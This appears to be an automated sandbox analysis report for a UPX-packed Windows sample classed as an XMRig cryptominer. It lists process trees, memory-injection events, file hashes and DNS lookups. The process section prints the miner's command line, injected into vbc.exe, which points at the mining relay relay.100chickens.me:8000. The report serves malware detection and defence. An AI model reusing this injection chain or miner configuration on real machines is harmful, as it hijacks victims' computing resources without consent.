Malware Analysis Report

2024-09-10 13:54

Sample ID 240613-qnxkqsvcnq
Target a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118
SHA256 9931ed9a4ecdbd530f9521963fd398b5e75db27b008bf23ca3d6533eeb71a9ac
Tags
xmrig miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9931ed9a4ecdbd530f9521963fd398b5e75db27b008bf23ca3d6533eeb71a9ac

Threat Level: Known bad

The file a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig miner upx

xmrig

XMRig Miner payload

UPX packed file

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 13:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 13:25

Reported

2024-06-13 13:27

Platform

win7-20240611-en

Max time kernel

149s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Uses the VBS compiler for execution

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2336 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2336 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2336 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2408 wrote to memory of 2932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2408 wrote to memory of 2932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2408 wrote to memory of 2932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D60.tmp" "c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\CSC626E9D94D2784E3A9660938EA453D8EA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 15 -u 1 -p x -k -a cryptonight --variant="-1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 99 -u 1 -p x -k -a cryptonight --variant="-1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 relay.100chickens.me udp

Files

memory/2336-0-0x000007FEF58B3000-0x000007FEF58B4000-memory.dmp

memory/2336-1-0x0000000000920000-0x00000000009A2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.cmdline

MD5 0f2e86c4e85c03d26d50bcb03356d5e2
SHA1 c5a4aa25bcc1adf991026db294b51086ef25e0c8
SHA256 7a8576fc55879e99d59c8342a7d2fc4950cb8053cd6b2b4a8b61fc03f7db64d1
SHA512 7866896835c52b356ed05d02c8a5cbf816d977e864c12335b8c8d882a1438f08820a0552a199600626a051f8daa50410f6f2f89295063ccd71a661486127251e

\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.0.cs

MD5 5948bce18180803e60088f2616225169
SHA1 0e992166427f0a8bce3849d9a3168c25f0733996
SHA256 d14f42c88c197dfa3d124b22280971ba819531752ef659ed2dd81e034082519a
SHA512 696fa5c75209a368ab5204f08c98140977360285849bd38eadb4db6e954d59291e0c36417afe84b129e8bbead6c4a1228a4dd70ec2eb0613d7f400496bfb049c

memory/2336-7-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\CSC626E9D94D2784E3A9660938EA453D8EA.TMP

MD5 f4a08c1e8d85cbc7aea7d8dc1b5a01f8
SHA1 5613ca5774bca147b9af27cfea0b8e9b6e79b2dd
SHA256 e55a535ce8ef7a8b3497b78fbdb2c10d103e24fdbdd021bb38fef925e427ace2
SHA512 a4ed1a5205f873ed8c88bffa999ced81b1bd69a1c75c27ce84562e038b2468e4fcea332d3d971efec8958209771e1fb10afa25f50dab3b9e926da4892a2f82c7

C:\Users\Admin\AppData\Local\Temp\RES1D60.tmp

MD5 bdef930111b15e12857483bd5a0e2421
SHA1 ad0d48c080133d6dc8d8325da9d8345a06e36a64
SHA256 aeb6dbec3e7ec80486f8de02afab121a53be2be3bcfc5fa9f0b0ed68b3bea1b9
SHA512 5cac5e679141cafcf9267577c10ad90fb379ebde472ee448097f7e00f67bb3bf542937bf99c8ad97234389fbe5ab5a9d567e403d12f1f4c2e408c9b0e91a8d48

C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.dll

MD5 8ff7b5b35765b4bd1135a9b17e13fcb6
SHA1 697a30a1fa69e653ebd33f3af2799e623f5bbdc0
SHA256 de31b0e4c39a4e1bf8002bad0b9db2d07f540d110bc90ab384b497960112c65c
SHA512 e522e4876cc6ba949ca7d91b67b906adaa1d771bc22c9cc12a84aa4208a03288515fbb3b2f4c65062de1d2fc0489d1944fca4a2f9c13a112e59401797364fc5b

C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.pdb

MD5 f956b429d574edd92d5daa75ccfe3e0e
SHA1 81341532110c4f75cbd7cccf684cea11bade5bf7
SHA256 683d8a0bce053409826f3312d638905451c8dab49112dbba67f0784b2ab12bd3
SHA512 7750f290359d0736e877ba2857c6ab8158e29cd6ab514b3afe10dd57881cc203c00a02650df79495e744f109ad983f93e2ca9d6198b6ed4e67230f8603f3172c

memory/2336-17-0x0000000000160000-0x0000000000168000-memory.dmp

memory/2336-19-0x0000000002100000-0x0000000002184000-memory.dmp

memory/2424-27-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

memory/2424-29-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-26-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-24-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-22-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-20-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2764-38-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

memory/2764-40-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2764-41-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2336-42-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 13:25

Reported

2024-06-13 13:27

Platform

win10v2004-20240611-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Uses the VBS compiler for execution

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3108 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3108 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2224 wrote to memory of 2728 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2224 wrote to memory of 2728 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37F8.tmp" "c:\Users\Admin\AppData\Local\Temp\2zybln3u\CSC69C60CB393BF40C397A0E077D3DE779.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 15 -u 1 -p x -k -a cryptonight --variant="-1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 99 -u 1 -p x -k -a cryptonight --variant="-1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 155.77.117.104.in-addr.arpa udp
BE 88.221.83.192:443 www.bing.com tcp
US 8.8.8.8:53 192.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 relay.100chickens.me udp

Files

memory/3108-0-0x0000000000240000-0x00000000002C2000-memory.dmp

memory/3108-1-0x00007FFB32433000-0x00007FFB32435000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.cmdline

MD5 54cb40d9b794882c2c149f774de9133a
SHA1 76374b7c76252fcec2c32bac1bb04ae9dae8915d
SHA256 4211eb643c4426860268c61a3c49392ced0b240b90daffc471ada01c58c46455
SHA512 cdbebea5235992441dd00d7bab9d299bcf0c74cfdf9676c792bbee8cbc7d89f88948e073d5930048fb965a8b3fc135497ca646f68561f0300b9ad0a95c1ca991

\??\c:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.0.cs

MD5 5948bce18180803e60088f2616225169
SHA1 0e992166427f0a8bce3849d9a3168c25f0733996
SHA256 d14f42c88c197dfa3d124b22280971ba819531752ef659ed2dd81e034082519a
SHA512 696fa5c75209a368ab5204f08c98140977360285849bd38eadb4db6e954d59291e0c36417afe84b129e8bbead6c4a1228a4dd70ec2eb0613d7f400496bfb049c

memory/3108-6-0x00007FFB32430000-0x00007FFB32EF1000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2zybln3u\CSC69C60CB393BF40C397A0E077D3DE779.TMP

MD5 d8831db7810f6d899bd69a53268b3abb
SHA1 3f665c6e0e68775922f6b7c19ce5f05bf5150800
SHA256 5739c8152809b5b6eb12783b3afc98735434955b3747e5c521153b4ba480fa46
SHA512 a5ace05cfbad4b9d361c551e4eb90548ae77b5f199352a78661e8ad7df18ca411fb3ca544af23465d917c738e4e8834c305d4f27458e972b7a10c26f1397d445

C:\Users\Admin\AppData\Local\Temp\RES37F8.tmp

MD5 e8e8484701b313589ea36e6be9119350
SHA1 851d26ca842cf853a82cf4bcb9c1bd800a3fa05d
SHA256 36d67c352b1a2eb845c20ecdf6f8a7076543ca463f7fcb02bf48138b90bddefe
SHA512 2345704240e4420faac19ee63ab9d7b52d3dabaaa7a61081ddb1283f806b28be992661cb2c3f58c15a1b949886d1e5e4dbde2eec74cfdcfc1032f2810c40ae43

C:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.dll

MD5 510200e372ad8b060830f424053a06ab
SHA1 dc71a0093c011744ae7cdc2e863740c22c75ef21
SHA256 9481f2dbad398442ba4963db0ff8d52848020456ed0020e1e0a43d0dcc41a032
SHA512 385b4ebbc3c7abfdf3d71205d360c56cd70e98e9a24595a0d417c77cb5382fde2e3b1bd97430ab097b00f3a8cef851adb3cf3ad238f6bee2fc2d63e89a1ce2d5

C:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.pdb

MD5 08e4eca89b8632c4f04bcd8ca6c623ae
SHA1 d71819cb1269700acb3ce79681c6637082500736
SHA256 00dc733a23db2cf2fbf99f67ef763fac626ee9e229655168b87404f9c7516efb
SHA512 c08f16e203ac8bba3245118ccbdb47c4036be93582b1856d77612e038ac58a626ab8a2bc67c6efda62e02af71fb0aadf698ae669936e3bd133f3c598e2ad1c09

memory/3108-17-0x0000000000BA0000-0x0000000000BA8000-memory.dmp

memory/3108-19-0x000000001B2F0000-0x000000001B374000-memory.dmp

memory/3904-20-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3108-23-0x00007FFB32430000-0x00007FFB32EF1000-memory.dmp

memory/3168-26-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-25-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-27-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-24-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-28-0x0000000000400000-0x0000000000529000-memory.dmp